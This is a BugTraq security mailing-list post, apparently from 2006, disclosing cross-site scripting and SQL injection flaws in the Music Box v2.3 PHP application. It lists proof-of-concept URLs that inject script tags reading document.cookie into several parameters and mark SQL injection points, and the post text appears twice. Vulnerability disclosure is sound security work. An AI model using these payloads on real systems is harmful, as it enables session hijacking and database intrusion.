BugTraq
Back to list
|
Post reply
XSS & SQL Injection in Music Box v2.3
Mar 24 2006 09:43PM
xx_hack_xx_2004 hotmail com
Hello
Vulnerable: Music Box v2.3
http://www.MusicboxV2.com
Exploit :
XSS :
http://example.com/music/index.php?id='><script>alert(document.cookie)</
script>
http://example.com/music/index.php?action=top&show=5&type='><script>aler
t(document.cookie)</script>
http://example.com/music/index.php?action=top&show='><script>alert(docum
ent.cookie)</script>&type=Artists
http://example.com/music/cart/cart.php?message1='><script>alert(document
.cookie)</script>
http://example.com/music/cart/cart.php?message='><script>alert(document.
cookie)</script>
SQL :
http://example.com/music/index.php?action=top&show=5&type=[SQL]
http://example.com/music/index.php?action=top&show=[SQL]&type=Artists
Discovery by Linux_Drox
http://www.lezr.com
Best Regards ,,
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Vulnerable: Music Box v2.3
http://www.MusicboxV2.com
Exploit :
XSS :
http://example.com/music/index.php?id='><script>alert(document.cookie)</
script>
http://example.com/music/index.php?action=top&show=5&type='><script>aler
t(document.cookie)</script>
http://example.com/music/index.php?action=top&show='><script>alert(docum
ent.cookie)</script>&type=Artists
http://example.com/music/cart/cart.php?message1='><script>alert(document
.cookie)</script>
http://example.com/music/cart/cart.php?message='><script>alert(document.
cookie)</script>
SQL :
http://example.com/music/index.php?action=top&show=5&type=[SQL]
http://example.com/music/index.php?action=top&show=[SQL]&type=Artists
Discovery by Linux_Drox
http://www.lezr.com
Best Regards ,,
[ reply ]